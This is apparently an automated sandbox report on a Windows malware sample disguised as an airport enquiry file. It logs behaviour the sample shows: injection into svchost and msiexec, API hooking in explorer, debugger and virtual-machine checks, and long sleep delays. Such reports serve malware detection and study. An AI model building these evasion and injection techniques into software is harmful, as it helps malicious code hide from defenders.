          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static file information: File size 1120768 > 1048576
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msiexec.pdb source: svchost.exe, 00000001.00000003.1731890191.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732589593.0000000002DE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1731832178.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000002.4130359525.0000000000970000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000001.00000003.1731890191.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732589593.0000000002DE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1731832178.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130359525.0000000000970000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1677807902.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1681546736.0000000004130000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1679568145.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1685637489.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.0000000003000000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.000000000514E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1732637113.0000000004C52000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1734235728.0000000004E07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1677807902.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1681546736.0000000004130000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1679568145.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1685637489.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.0000000003000000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000002.4131442242.000000000514E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1732637113.0000000004C52000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1734235728.0000000004E07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4144395601.0000000010E1F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130764013.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4132018408.00000000054FF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4144395601.0000000010E1F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130764013.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4132018408.00000000054FF000.00000004.10000000.00040000.00000000.sdmp
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CFC304 LoadLibraryA,GetProcAddress, 0_2_00CFC304
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CE8719 push FFFFFF8Bh; iretd 0_2_00CE871B
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CAE94F push edi; ret 0_2_00CAE951
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CAEA68 push esi; ret 0_2_00CAEA6A
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CA8B85 push ecx; ret 0_2_00CA8B98
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CAEC43 push esi; ret 0_2_00CAEC45
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CAED2C push edi; ret 0_2_00CAED2E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0300225F pushad ; ret 1_2_030027F9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030027FA pushad ; ret 1_2_030027F9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx 1_2_030309B6
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0300283D push eax; iretd 1_2_03002858
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0300135E push eax; iretd 1_2_03001369
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02690006 push cs; retf 1_2_0269000C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02686A5F push esp; ret 1_2_02686A65
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_026869BA push edi; ret 1_2_026869C2
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02687012 push ds; retf 1_2_02687016
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0268D4B5 push eax; ret 1_2_0268D508
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0268D56C push eax; ret 1_2_0268D572
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0268D50B push eax; ret 1_2_0268D572
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0268D502 push eax; ret 1_2_0268D508
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EEB1E push esp; retn 0000h 1_2_035EEB1F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EEB02 push esp; retn 0000h 1_2_035EEB03
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EE9B5 push esp; retn 0000h 1_2_035EEAE7
          Source: C:\Windows\explorer.exe Code function: 2_2_0E695B02 push esp; retn 0000h 2_2_0E695B03
          Source: C:\Windows\explorer.exe Code function: 2_2_0E695B1E push esp; retn 0000h 2_2_0E695B1F
          Source: C:\Windows\explorer.exe Code function: 2_2_0E6959B5 push esp; retn 0000h 2_2_0E695AE7
          Source: C:\Windows\explorer.exe Code function: 2_2_0FC25B02 push esp; retn 0000h 2_2_0FC25B03
          Source: C:\Windows\explorer.exe Code function: 2_2_0FC25B1E push esp; retn 0000h 2_2_0FC25B1F
          Source: C:\Windows\explorer.exe Code function: 2_2_0FC259B5 push esp; retn 0000h 2_2_0FC25AE7
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 3_2_00979F2D push ecx; ret 3_2_00979F40
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 3_2_04FB27FA pushad ; ret 3_2_04FB27F9
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 3_2_04FB225F pushad ; ret 3_2_04FB27F9
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe File created: \new al maktoum international airport enquiry ref #2401249.exe
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 3_2_00977DD0 StartServiceCtrlDispatcherW,GetLastError, 3_2_00977DD0

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xEB
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00C84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00C84A35
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00D055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00D055FD
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CA33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00CA33C7
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe API/Special instruction interceptor: Address: 22A3214
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 2679904 second address: 267990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 2679B7E second address: 2679B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0307096E rdtsc 1_2_0307096E
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2839
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 7097
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 867
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 884
          Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-98244
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe API coverage: 4.2 %
          Source: C:\Windows\SysWOW64\svchost.exe API coverage: 2.0 %
          Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 1.7 %
          Source: C:\Windows\explorer.exe TID: 7780 Thread sleep count: 2839 > 30
          Source: C:\Windows\explorer.exe TID: 7780 Thread sleep time: -5678000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7780 Thread sleep count: 7097 > 30
          Source: C:\Windows\explorer.exe TID: 7780 Thread sleep time: -14194000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7636 Thread sleep count: 5505 > 30
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7636 Thread sleep time: -11010000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7636 Thread sleep count: 4467 > 30
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7636 Thread sleep time: -8934000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CE4696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00CE4696
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00CEC9C7
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CEC93C FindFirstFileW,FindClose, 0_2_00CEC93C
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00CEF200
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00CEF35D
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00CEF65E
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00CE3A2B
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00CE3D4E
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00CEBF27
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00C84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00C84AFE
          Source: explorer.exe, 00000002.00000000.1693190718.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000000.1692654831.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000002.00000000.1692654831.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000002.00000000.1693190718.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000002.4130664526.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000002.00000003.3105640065.0000000009976000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000002.00000000.1692654831.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000002.00000003.3106730980.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000097D4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000003.3105640065.0000000009976000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000002.00000003.3106633874.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000002.00000002.4130664526.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000002.00000002.4135231321.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000002.00000002.4130664526.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe API call chain: ExitProcess graph end node graph_0-96914
          Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0307096E rdtsc 1_2_0307096E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03072B60 NtClose,LdrInitializeThunk, 1_2_03072B60
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CF41FD BlockInput, 0_2_00CF41FD
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00C83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00C83B4C
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CB5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00CB5CCC
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CFC304 LoadLibraryA,GetProcAddress, 0_2_00CFC304
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h] 1_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h] 1_2_0302C310
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h] 1_2_03050310
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03108324 mov eax, dword ptr fs:[00000030h] 1_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03108324 mov ecx, dword ptr fs:[00000030h] 1_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h] 1_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h] 1_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h] 1_2_030FA352
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030D8350 mov ecx, dword ptr fs:[00000030h] 1_2_030D8350
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0310634F mov eax, dword ptr fs:[00000030h] 1_2_0310634F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030D437C mov eax, dword ptr fs:[00000030h] 1_2_030D437C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h] 1_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h] 1_2_0305438F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h] 1_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h] 1_2_030EC3CD
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h] 1_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h] 1_2_030B63C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h] 1_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h] 1_2_030D43D4
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h] 1_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030663FF mov eax, dword ptr fs:[00000030h] 1_2_030663FF
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302823B mov eax, dword ptr fs:[00000030h] 1_2_0302823B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h] 1_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h] 1_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0310625D mov eax, dword ptr fs:[00000030h] 1_2_0310625D
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h] 1_2_0302A250
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03036259 mov eax, dword ptr fs:[00000030h] 1_2_03036259
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h] 1_2_030EA250
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h] 1_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302826B mov eax, dword ptr fs:[00000030h] 1_2_0302826B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h] 1_2_0306E284
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h] 1_2_030B0283
